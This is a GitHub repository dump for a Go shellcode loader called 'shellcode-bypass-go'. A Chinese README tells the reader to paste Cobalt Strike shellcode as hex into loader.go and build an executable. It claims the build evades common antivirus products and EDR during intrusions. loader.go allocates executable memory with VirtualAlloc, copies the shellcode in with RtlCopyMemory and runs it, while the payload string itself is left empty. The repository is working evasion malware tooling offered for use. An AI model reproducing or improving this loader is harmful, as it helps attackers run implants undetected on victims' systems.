├── README.assets ├── image-20211231165517173.png ├── image-20211231165659634.png ├── image-20211231171139031.png └── image-20211231171310384.png ├── README.md ├── go.mod └── loader.go /README.assets/image-20211231165517173.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3rwin/shellcode-bypass-go/2b671e7bc469033ccded976c36b368753afde9a9/README.assets/image-20211231165517173.png -------------------------------------------------------------------------------- /README.assets/image-20211231165659634.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3rwin/shellcode-bypass-go/2b671e7bc469033ccded976c36b368753afde9a9/README.assets/image-20211231165659634.png -------------------------------------------------------------------------------- /README.assets/image-20211231171139031.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3rwin/shellcode-bypass-go/2b671e7bc469033ccded976c36b368753afde9a9/README.assets/image-20211231171139031.png -------------------------------------------------------------------------------- /README.assets/image-20211231171310384.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3rwin/shellcode-bypass-go/2b671e7bc469033ccded976c36b368753afde9a9/README.assets/image-20211231171310384.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # shellcode go语言免杀 2 | 3 | ## 使用方法 4 | 5 | 1.将cs生成的C的shellcode转变成hex字符串,把`\x`全部替换成空字符即可 6 | 7 | ![image-20211231165517173](README.assets/image-20211231165517173.png) 8 | 9 | 2.将字符串复制到变量`shellcode_hex`中 10 | 11 | ![image-20211231165659634](README.assets/image-20211231165659634.png) 12 | 13 | 3.使用 `go build -o bypass.exe loader.go`即可在当前目录生成一个`bypass.exe`文件,运行有黑窗,使用`go build -o bypass.exe -ldflags -H=windowsgui loader.go`去黑窗会被360查杀,360这查杀就离谱。。。还是用来内网渗透的时候过edr后台运行靠谱。 14 | 15 | ## 免杀效果 16 | 17 | 1.国产三件套 18 | 19 | ![image-20211231171310384](README.assets/image-20211231171310384.png) 20 | 21 | 2.在线查杀效果 22 | 23 | ![image-20211231171139031](README.assets/image-20211231171139031.png) -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module loader 2 | 3 | go 1.16 4 | -------------------------------------------------------------------------------- /loader.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/hex" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | const ( 11 | MEM_COMMIT = 0x1000 12 | MEM_RESERVE = 0x2000 13 | PAGE_EXECUTE_READWRITE = 0x40 14 | ) 15 | 16 | var ( 17 | kernel32 = syscall.MustLoadDLL("kernel32.dll") //调用kernel32.dll 18 | ntdll = syscall.MustLoadDLL("ntdll.dll") //调用ntdll.dll 19 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") //使用kernel32.dll调用ViretualAlloc函数 20 | RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") //使用ntdll调用RtCopyMemory函数 21 | // 生成C类型的shellcode,转换成hex值 22 | shellcode_hex = "" 23 | ) 24 | 25 | func checkErr(err error) { 26 | if err != nil { //如果内存调用出现错误,可以报出 27 | if err.Error() != "The operation completed successfully." { //如果调用dll系统发出警告,但是程序运行成功,则不进行警报 28 | println(err.Error()) //报出具体错误 29 | os.Exit(1) 30 | } 31 | } 32 | } 33 | 34 | func main() { 35 | // _ 匿名变量 36 | shellcode, _ := hex.DecodeString(shellcode_hex) 37 | //调用VirtualAlloc为shellcode申请一块内存 38 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 39 | if addr == 0 { 40 | checkErr(err) 41 | } 42 | 43 | //调用RtlCopyMemory来将shellcode加载进内存当中 44 | _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 45 | checkErr(err) 46 | 47 | //syscall来运行shellcode 48 | syscall.Syscall(addr, 0, 0, 0, 0) 49 | } 50 | --------------------------------------------------------------------------------